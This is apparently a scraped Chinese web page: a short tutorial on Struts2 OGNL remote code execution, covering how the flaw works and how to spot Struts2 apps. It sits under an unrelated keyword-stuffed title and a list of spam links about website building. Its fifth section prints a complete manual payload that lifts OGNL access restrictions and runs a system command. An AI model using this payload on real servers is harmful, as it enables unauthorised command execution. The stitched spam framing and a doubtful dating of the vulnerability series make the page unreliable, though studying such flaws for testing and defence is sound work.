当前位置: 首页 > news >正文

景德镇陶瓷企业网站建设网站建设都 包括哪些

景德镇陶瓷企业网站建设,网站建设都 包括哪些,财务软件排名,招聘seo专员文章目录 一、Struts2框架介绍二、Struts2远程代码执行漏洞三、Struts2执行代码的原理四、Struts2框架特征五、漏洞手工POC六、漏洞工具复现 一、Struts2框架介绍 ------ Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网…

文章目录

  • 一、Struts2框架介绍
  • 二、Struts2远程代码执行漏洞
  • 三、Struts2执行代码的原理
  • 四、Struts2框架特征
  • 五、漏洞手工POC
  • 六、漏洞工具复现


一、Struts2框架介绍

------ Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站

------ Struts框架本身分为三个部分:核心控制器FilterDispatcher、业务控制器Action和用户实现的企业业务逻辑组件。


二、Struts2远程代码执行漏洞

------ Struts2漏洞是一个经典的漏洞系列,是在2019年被报出来的,根源在于Struts2引入了OGNL表达式使得框架具有灵活的动态性。随着整体框架的补丁完善,现在想挖掘新的Struts2漏洞会比以前困难很多,从实际了解的情况来看,大部分用户早就修复了历史的高危漏洞。目前在做渗透测试时,Struts2漏洞主要也是碰碰运气,或者是打到内网之后用来攻击没打补丁的系统会比较有效。


三、Struts2执行代码的原理

------ Struts2的动态性在于 OGNL表达式可以获取到运行变量的值,并且有机会执行函数调用。如果可以把恶意的请求参数送到 OGNL的执行流程中,就会导致任意代码执行漏洞。

------ Struts2的rce本质都是一样的(除了S2-052以外),都是Struts2框架执行了恶意用户传进来的 OGNL表达式,造成远程代码执行。可以造成“命令执行、服务器文件操作、打印回显、获取系统属性、危险代码执行”等,只不过需要精心构造不同的 OGNL代码而已。


四、Struts2框架特征

  1. 查看被测应用系统的源码,URL接口地址以 “.action” “.do”结尾或者地址中包含“!”符号

  2. 在被测应用的服务器上查看应用所在目录/WEB-INF/lib/下的jar文件,若存在struts2-core2.*.**.jar 或 xwork-core-2.*.**.jar格式的jar文件,则需检测是否存在Struts2远程代码执行漏洞。


五、漏洞手工POC

poc:

(%23_memberAccess[‘allowPrivateAccess’]=true,%23_memberAccess[‘allowProtectedAccess’]=true,%23_memberAccess[‘excludedPackageNamePatterns’]=%23_memberAccess[‘acceptProperties’],%23_memberAccess[‘excludedClasses’]=%23_memberAccess[‘acceptProperties’],%23_memberAccess[‘allowPackageProtectedAccess’]=true,%23_memberAccess[‘allowStaticMethodAccess’]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream()))

注意:有些情况利用的时候要记得url编码

其他struts2版本的POC可以参考:
https://vulhub.org/#/environments/struts2/


六、漏洞工具复现

在这里插入图片描述


http://www.yayakq.cn/news/502470/

相关文章:

  • 工程建设招投标网站网络服务提供者不履行法律、行政法规
  • 签订网站制作协议需注意什么app制作需要哪些技术
  • 移动门网站建设宁宁网seo
  • 单位做网站注意什么问题昆明抖音代运营公司
  • 教学类网站开发网页设计说明万能模板
  • 最简单的网站开发软件wordpress 2
  • 管理网站科技部
  • html5 企业网站wordpress 点击 排名
  • 网站建设痛点搜狗推广开户费多少钱
  • 淘客怎么做网站wordpress可以上传文件吗
  • 呼市做网站建设的公司哪家好攻击自己做的网站
  • 网站建设与管理 需求分析网站建设ahxkj
  • 如何做电影网站狼视听赣州信息港主页
  • 网站上传文件存储方式人网站建站
  • 本地网站源码cps推广
  • 天津品牌网站建设公司排名建设通app官网下载安装
  • 平面设计展示网站河南省建设工会网站
  • 室内设计网站免费素材移动端模板网站建设
  • 石家庄网站建设哪家专业企航网络推广
  • 网站平台建设方案书手机网站用什么软件做的好
  • 建设网站公司浩森宇特郑州做网站那家好
  • 网站改版索引量下降制作企业网站需要注意的事项
  • 毕设做网站的系统概述怎么写商城类网站建设
  • 公司网站运营网站服务器建设的三种方法是什么
  • 专业的河南网站建设价格个人订阅号支持微网站的建设吗
  • 上海做网站的故事哪家好注册域名后网站建设
  • 哪家做网站好的南阳优化网站排名
  • 网站设计协议做网站竞争大吗
  • dns服务器 域名不存在时 跳转到指定网站国家建设协会官方网站
  • 大连省建设厅网站移动公司需要网络工程专业